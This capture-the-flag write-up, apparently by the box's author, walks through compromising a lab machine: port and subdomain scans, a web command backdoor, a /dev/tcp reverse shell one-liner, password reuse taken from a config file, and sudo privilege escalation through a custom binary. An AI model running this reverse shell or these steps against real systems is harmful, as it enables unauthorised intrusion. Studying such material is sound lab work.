
ENUMERATION

First thing we do is scan the ports:

Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-25 01:20 EAT
Nmap scan report for sharp.h4k (23.101.27.202)
Host is up (0.39s latency).
Not shown: 96 closed tcp ports (conn-refused)
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql

Nmap done: 1 IP address (1 host up) scanned in 2.26 seconds

Got 4 ports open!

Opened up port 80 in the browser, but nothing shows up, just the default Apache2 placeholder page.

Since I made this challenge I won't dirbust, because I know that once I dirbust nothing will show up; there is nothing there at all. So what I'll be showing is the legit way (THE INTENDED WAY) to solve my box!

RECON

So the first thing is to perform a subdomain scan,

and we get 3 subdomains that are found :

admin.sharp.h4k
api.sharp.h4k
pma.sharp.h4k

So the first thing that comes to mind is that admin.sharp.h4k must be the admin panel, api.* is the API or something like it, and pma.sharp.h4k is probably the phpMyAdmin portal.

Add those subdomains to your /etc/hosts file, then let's get started by first checking the admin panel.

And we are viewing a login page for an admin dashboard

Trying SQLi won't work :) so it'd be a total waste of time, but basically that is what a person solving this box would do: try SQLi and maybe dirbusting. I assure you, you will get nothing at all :)

So let's check api.sharp.h4k. We get an under-development page, so the API is still under development, but developers often leave a backup file inside even while it's still under development, so let's try dirbusting this subdomain instead:

Okay, looks like we have one directory, and that is /images/. So let's dive into it:

Alright, looks like we have something titled SECRET API CALLS!

This sure looks like a backdoor that a hacker might have installed on the same target we are given. Let's try typing in a command and see what we get!

That is what I got after typing id, so yes, we are right: it's a backdoor.

GAINING INITIAL FOOTHOLD

We can easily get a shell by just setting up a listener and then forwarding ourselves a shell, easy as that, so let's try it!

So on my terminal I'll set up a listener on port 1337.

And then from the input I'll type in a command that will give us back a revshell, as follows:

bash -c "bash -i &>/dev/tcp/yourip/1337 <&1"

and then click submit.

You didn't expect that to work, did you??
Well, the reason it didn't work is that the server has a public IP and we have a private IP, so either you use a VPS to catch the shell or you make your localhost PUBLIC. I have a VPS, so I'll just go ahead and use it instead! If you don't have a VPS, you can use Ngrok for tunneling.

Alright, now that I have a listener running on my VPS, I just do the same thing but with my VPS's IP address and not my localhost.

And boom we have SHELL!!!

So now let's gather some config files and escalate our privileges to a user. First of all, let's check what users are available:

www-data@sharp:/var/www/api/images$ cat /etc/passwd | grep /home
cat /etc/passwd | grep /home
xploiter:x:1000:1000::/home/xploiter:/bin/bash
babukrismasi:x:1001:100::/home/babukrismasi:/bin/bash

We have a total of 2 users, xploiter and babukrismasi, so let's grab some config files by performing some lateral movement:

www-data@sharp:/var/www$ -al
ls -al
total 24
drwxr-xr-x  6 root root 4096 Dec 24 10:58 .
drwxr-xr-x 12 root root 4096 Dec 20 22:04 ..
drwxr-xr-x  4 root root 4096 Dec 24 10:51 admin
drwxr-xr-x  3 root root 4096 Dec 24 11:26 api
drwxr-xr-x  2 root root 4096 Dec 20 22:04 html
drwxr-xr-x 11 root root 4096 Dec 24 11:02 myadmin

Moving into admin first, because dashboards like these usually have configuration files:

www-data@sharp:/var/www/admin/lib$ -la
ls -la
total 32
drwxr-xr-x 2 root root 4096 Dec 24 11:12 .
drwxr-xr-x 4 root root 4096 Dec 24 10:51 ..
-rw-r--r-- 1 root root   13 Jun  8  2018 .htaccess
-rw-r--r-- 1 root root  711 Dec 24 11:12 Core.php
-rw-r--r-- 1 root root 1131 Nov 11 10:18 LIB-database.php
-rw-r--r-- 1 root root   47 Nov 11 00:17 PAGE-bottom.php
-rw-r--r-- 1 root root 1546 Nov 11 11:00 PAGE-top.php
-rw-r--r-- 1 root root  693 Jan 28  2021 SQL-users.sql

I found Core.php, which contains the MySQL connection settings:

www-data@sharp:/var/www/admin/lib$ cat Core.php	
cat Core.php
<?php
// (A) ERROR HANDLING - CHANGE TO YOUR OWN
error_reporting(E_ALL & ~E_NOTICE);
ini_set("display_errors", 1);
// ini_set("log_errors", 1);
// ini_set("error_log", "PATH/error.log");

// (B) DATABASE SETTINGS - CHANGE TO YOUR OWN
define("DB_HOST", "localhost");
define("DB_NAME", "panel");
define("DB_CHARSET", "utf8");
define("DB_USER", "root");
define("DB_PASSWORD", "superPassw0rd");

// (C) URL
define("URL_HOST", "http://admin.sharp.h4k/"); // CHANGE TO YOUR OWN
define("URL_PUBLIC", URL_HOST . "public/");

// (D) FILE PATHS
define("PATH_LIB", __DIR__ . DIRECTORY_SEPARATOR);
define("PATH_BASE", dirname(PATH_LIB) . DIRECTORY_SEPARATOR);

// (E) START SESSION
session_start();

So we got the MySQL username and password, root:superPassw0rd. Let's try reusing the same password for the available users.

FOOTHOLD USER

I was now able to log in via SSH as babukrismasi with the password superPassw0rd.

And we get the flag from his home folder:

babukrismasi@sharp:~$ ls -al
total 24
drwxr-xr-x 2 babukrismasi users 4096 Des 24 12:49 .
drwxr-xr-x 4 root         root  4096 Des 24 11:34 ..
-rw-r--r-- 1 babukrismasi users  220 Mei 15  2017 .bash_logout
-rw-r--r-- 1 babukrismasi users 3526 Mei 15  2017 .bashrc
-rw-r--r-- 1 root         root    24 Des 24 12:49 flag.txt
-rw-r--r-- 1 babukrismasi users  675 Mei 15  2017 .profile
babukrismasi@sharp:~$ cat flag.txt 
h4k-it{USERMTATA_KWELI}
FLAG FOR SHARP - USER : h4k-it{USERMTATA_KWELI}

PRIVILEGE ESCALATION

Alright, with that found, let's escalate our privileges to root.

So the first thing we do is check which binaries we are allowed to run with sudo, using sudo -l:

babukrismasi@sharp:~$ sudo -l
[sudo] password for babukrismasi: 
Matching Defaults entries for babukrismasi on sharp:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User babukrismasi may run the following commands on sharp:
    (ALL) /usr/bin/vitayakrismasi

We can run the binary named vitayakrismasi with sudo as user babukrismasi, so let's see what the binary does and reverse it if we need to!

It needs a username to proceed, so I check the strings and I'm able to get a glimpse of what the username and password might be:

So the usernames, according to my gathering, can be either spiderman or fazakrismasi, so let's give it a try.

We get prompted for a password:

babukrismasi@sharp:~$ sudo vitayakrismasi
SPIDERMAN VERSUS BABU KRISMASI
UTAJUA HUJUI KUDADEKI! 
Enter username : fazakrismasi
Welcome Faza Krismasi , Enter your password : adminadmin
IMPOSTER NYAMA WEWE!

But we don't know the password. I try running ltrace, but still nothing comes across:

babukrismasi@sharp:~$ ltrace vitayakrismasi 1
puts("SPIDERMAN VERSUS BABU KRISMASI"SPIDERMAN VERSUS BABU KRISMASI
)                           = 31
puts("UTAJUA HUJUI KUDADEKI! "UTAJUA HUJUI KUDADEKI! 
)                                  = 24
printf("Enter username : ")                                      = 17
gets(0x7ffd421a0ef6, 0x5632251afa6f, 0x7f6569ba5760, 0x5632251afa80Enter username : fazakrismasi
) = 0x7ffd421a0ef6
strcmp("fazakrismasi", "spiderman")                              = -13
strcmp("fazakrismasi", "fazakrismasi")                           = 0
printf("Welcome Faza Krismasi , Enter yo"...)                    = 46
__isoc99_scanf(0x5632251afab3, 0x7ffd421a0ed8, 0x7f6569ba5760, 0x5632251afb4eWelcome Faza Krismasi , Enter your password : admin
) = 0
puts("IMPOSTER NYAMA WEWE!"IMPOSTER NYAMA WEWE!
)                                     = 21
+++ exited (status 0) +++
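Reading the trace: each username is checked with a libc strcmp(), but after scanf() there is no string comparison at all, and scanf() returned 0 for the non-numeric input admin. That is consistent with the password being parsed as a number and compared in plain code that ltrace cannot see, because only library calls are traced. Below is an added, hypothetical C reconstruction of that check (not the box's binary; the "%d" conversion is my assumption, the usernames and the number 25122021 come from this writeup), with the gets() seen in the trace replaced by fgets() since gets() has no length limit:

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical reconstruction of the login check in vitayakrismasi, inferred
 * from the ltrace output above. Added example code, not the box's binary.
 * Usernames and the number 25122021 come from the writeup; that the password
 * is read with a "%d" conversion is an assumption. */
#define USER_SPIDERMAN "spiderman"
#define USER_FAZA      "fazakrismasi"
#define SECRET_NUMBER  25122021        /* contents of /tmp/tobedeleted.txt */

enum login_result { LOGIN_BAD_USER = -1, LOGIN_BAD_PASS = 0, LOGIN_OK = 1 };

/* The username goes through libc strcmp(), so ltrace prints it.
 * The password is converted with "%d" and compared with ==, which compiles
 * to plain CPU instructions with no library call, so ltrace never shows it. */
enum login_result check_login(const char *user, const char *pass_input)
{
    if (strcmp(user, USER_SPIDERMAN) != 0 && strcmp(user, USER_FAZA) != 0)
        return LOGIN_BAD_USER;
    int n = 0;
    /* In the trace scanf returned 0 for the input "admin": a "%d" conversion
     * fails on non-digit input, which is why only a number can ever match. */
    if (sscanf(pass_input, "%d", &n) != 1)
        return LOGIN_BAD_PASS;
    return n == SECRET_NUMBER ? LOGIN_OK : LOGIN_BAD_PASS;
}

int main(void)
{
    char user[64], pass[64];
    puts("SPIDERMAN VERSUS BABU KRISMASI");
    printf("Enter username : ");
    /* fgets() instead of the gets() seen in the trace: gets() has no bound. */
    if (!fgets(user, sizeof user, stdin)) return 1;
    user[strcspn(user, "\n")] = '\0';
    printf("Enter your password : ");
    if (!fgets(pass, sizeof pass, stdin)) return 1;
    pass[strcspn(pass, "\n")] = '\0';
    switch (check_login(user, pass)) {
    case LOGIN_OK:       puts("Access granted (the real binary cats /root/flag.txt here)"); break;
    case LOGIN_BAD_PASS: puts("IMPOSTER NYAMA WEWE!"); break;
    default:             puts("Unknown user"); break;
    }
    return 0;
}
```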

So there are basically two ways of getting the password now: the first way is to guess, and the second way is to pull the binary to your localhost for investigation, and I'll consider doing that, lol!

First, move to /tmp:

babukrismasi@sharp:/tmp$ ls -l
total 60
-rw-r--r-- 1 xploiter     xploiter 35560 Apr 29  2019 mysql-apt-config_0.8.13-1_all.deb
drwx------ 3 root         root      4096 Des 24 13:10 systemd-private-773be1f6958c44f29cfec16a7f1b4984-apache2.service-b1WVzE
drwx------ 3 root         root      4096 Des 23 14:14 systemd-private-773be1f6958c44f29cfec16a7f1b4984-systemd-timesyncd.service-h1j06s
-rw-r--r-- 1 babukrismasi users        9 Des 25 15:16 tobedeleted.txt
-rwxr-xr-x 1 xploiter     xploiter  8912 Des 25 15:13 vitayakrismasi

We find the binary also available there, and we also have another file named tobedeleted.txt. Let's read it:

babukrismasi@sharp:/tmp$ cat tobedeleted.txt 
25122021

Alright, we get some numbers that make up the Christmas date. That's probably the password, so let's test it on the binary:

babukrismasi@sharp:/tmp$ ./vitayakrismasi 
SPIDERMAN VERSUS BABU KRISMASI
UTAJUA HUJUI KUDADEKI! 
Enter username : fazakrismasi
Welcome Faza Krismasi , Enter your password : 25122021
Why are you mad na?, RELAX BIG MAN , Spiderman ran away!
cat: /root/flag.txt: Permission denied

And it worked perfectly!

So now let's do it with sudo:

babukrismasi@sharp:~$ sudo vitayakrismasi 
[sudo] password for babukrismasi: 
SPIDERMAN VERSUS BABU KRISMASI
UTAJUA HUJUI KUDADEKI! 
Enter username : fazakrismasi
Welcome Faza Krismasi , Enter your password : 25122021
Why are you mad na?, RELAX BIG MAN , Spiderman ran away!
h4k-it{uschezenakrismasi_sio_poa}

and we have the ROOT FLAG!!!

h4k-it{uschezenakrismasi_sio_poa}


25 | 12 | 2021 | @tahaafarooq (twitter)